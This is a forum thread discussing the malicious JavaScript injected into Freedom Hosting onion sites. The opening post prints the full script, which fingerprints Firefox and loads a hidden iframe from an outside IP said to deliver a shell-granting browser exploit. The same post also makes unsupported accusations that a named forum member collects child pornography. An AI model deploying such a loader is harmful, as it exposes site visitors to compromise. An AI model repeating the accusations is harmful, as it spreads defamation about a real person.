Results 1 to 9 of 9

Thread: 50% of all pedo sites on TOR compromised by FBI, Rollo cant decide if he should shit or go blind first

  1. #1
    Nova Scotia's REAL #1 Webcam DJ sonatine's Avatar
    Reputation
    316
    Join Date
    Mar 2012
    Posts
    3,201

    50% of all pedo sites on TOR compromised by FBI, Rollo cant decide if he should shit or go blind first

    It doesnt matter really because neither is going to keep Rollo Tomasi out of jail for collecting child pornography, which is how he blows off steam after he gets stomped into wine every time he opens his mouth on the forum.

    Anyway, a TOR user cruising an .onion site noticed some strange traffic on his network and discovered that half the sites at least on "freedom hosting" aka .onion were serving this code:

    Code:
    function createCookie(name,value,minutes) {
            if (minutes) {
                    var date = new Date();
                    date.setTime(date.getTime()+(minutes*60*1000));
                    var expires = "; expires="+date.toGMTString();
            }
            else var expires = "";
            document.cookie = name+"="+value+expires+"; path=/";
    }
     
    function readCookie(name) {
        var nameEQ = name + "=";
        var ca = document.cookie.split(';');
        for(var i=0;i < ca.length;i++) {
            var c = ca[i];
            while (c.charAt(0)==' ') c = c.substring(1,c.length);
            if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
        }
        return null;
    }
     
    function isFF() {
        return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
    }
     
    function updatify() {
        var iframe = document.createElement('iframe');
        iframe.style.display = "inline";
        iframe.frameBorder = "0";
        iframe.scrolling = "no";
        iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66";
        iframe.height = "5";
        iframe.width = "*";
        document.body.appendChild(iframe);
    }
     
    function freedomhost() {
        if ( ! readCookie("n_serv") ) {
            createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);
            updatify();
        }
    }
     
    function isReady()
    {
        if ( document.readyState === "interactive" || document.readyState === "complete" ) {
       
            if ( isFF() ) {
                //window.alert(window.location + "Firefox Detected.")
                freedomhost();
            }
        }
        else
        {
            setTimeout(isReady, 250);
        }
    }
    setTimeout(isReady, 250);
    Basically that checks to see if youre running the most popular TOR bundled version of Firefox on Windows.

    Which, inexplicably, no longer disables javascript by default.

    If so, this iframe is served:

    iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66";

    And a javascript exploit is delivered to the TOR browser, affording the remote actor shell access to your computer.

    Given the recent success at the FBI with gaining access to TOR pedo rings, it should be obvious whose sitting at ip 65.222.202.53.

    So basically if youre running TOR and you view anything on .onion, youre machine gets prawned by FBI.

    TORs response is basically "we are TOR, they are Freedom Hosting, this is between yall, we are looking into patching that exploit one of these days if we can.", so it sounds like TOR is basically perfectly ok with Rollo and his pedo ilk getting flushed down the drain.

    But Im totally sure silk road is secure.

    will rep for dogecoins DJaAuU5poKWoAt1BEt9cNWAYWekNEv4aKZ

  2. #2
    Wasn't TOR developed by the government in the first place?

    Pretty LOL that people use it to commit crimes and think they're anonymous.

  3. #3
    Nova Scotia's REAL #1 Webcam DJ sonatine's Avatar
    Reputation
    316
    Join Date
    Mar 2012
    Posts
    3,201
    Yeah it was 100%, but its like crypto; even if you develop a high end algorithm, it doesnt mean you can compromise it. In fact the only way to attack the TOR protocol is to compromise nodes (which has also been done btw). Once you can view traffic taking place on a statistically significant number of TOR nodes, you can basically match an internal stream with a stream hitting a TOR access point, is my understanding.

    But breaking into the largest multi-tenant site host on the TOR network and dishing out browser based exploits to anyone viewing them is Serious Business and a quantum leap from passive monitoring to active exploitation and enumeration.
    will rep for dogecoins DJaAuU5poKWoAt1BEt9cNWAYWekNEv4aKZ

  4. #4
    Contributor Rollo Tomasi's Avatar
    Reputation
    -82
    Join Date
    Mar 2012
    Location
    Gulfstream Park
    Posts
    2,817

  5. #5
    I never understood the logic behind people going "Oh, the government can't find me if I use this prepackaged software that everybody knows about? Sounds like there's nothing that can go wrong."

    I've never used TOR and I never plan to use TOR because I think it just screams "Look at me! I'm probably doing something illegal." more than anything. Even if I used it just for privacy there's just way too much shit on that network that's bad to justify using it vs. other means of privacy.

  6. #6
    Quote Originally Posted by anonamoose View Post
    I never understood the logic behind people going "Oh, the government can't find me if I use this prepackaged software that everybody knows about? Sounds like there's nothing that can go wrong."

    I've never used TOR and I never plan to use TOR because I think it just screams "Look at me! I'm probably doing something illegal." more than anything. Even if I used it just for privacy there's just way too much shit on that network that's bad to justify using it vs. other means of privacy.
    In theory, software that everyone knows about can be secure using strong cryptography. And in theory, millions of eyes are reviewing all of the code involved and patching vulnerabilities. But as we've seen, all of this shit is laughably low rent. These super hackers had Javascript enabled, and it took months for someone to notice this suspicious traffic?

  7. #7
    Rather insane to read that the javascript was turned on so as to allow better user experiences with tor and shit, to make the browser more useful. To use that as a reason, and to get away with it, blows my mind. Yes, improve the user experience in all manners, except the one they're using tor for in the 1st place. Fuck it, they should just make it automatically log into your google account, so you have the web history convenience as well, for a better customer experience and whatnot.

    This ain't the 1st time the tor/firefox shit has been screwed with, in the name if de-pedo'ing the secret services. Last time it was the mozilla foundation itself, along with anonymous.
    @CursedDiamonds on twitter

  8. #8
    Nova Scotia's REAL #1 Webcam DJ sonatine's Avatar
    Reputation
    316
    Join Date
    Mar 2012
    Posts
    3,201
    At worse, the odds are 50/50 that the devs were pressured into enabling it or offered to do so in order to assist.

    Its almost impossible to believe that they did so for aesthetic reasons.
    will rep for dogecoins DJaAuU5poKWoAt1BEt9cNWAYWekNEv4aKZ

  9. #9
    So does this mean Micon is screwed for using Silk Road?

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Rollo Tomasi speaks out!
    By bottomset_69 in forum Flying Stupidity
    Replies: 0
    Last Post: 05-17-2013, 04:32 AM
  2. i stole a guys 1 dollar small blind
    By Zap_the_Fractions_Giraffe in forum Flying Stupidity
    Replies: 19
    Last Post: 02-28-2013, 06:08 PM
  3. Replies: 32
    Last Post: 02-04-2013, 01:44 AM
  4. Pedo-Reservations for pedophiles?
    By NaturalBornHustler in forum Flying Stupidity
    Replies: 12
    Last Post: 12-28-2012, 02:57 PM
  5. For the blind scot who apparently cannot read
    By 408Mike in forum Flying Stupidity
    Replies: 4
    Last Post: 03-15-2012, 09:38 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •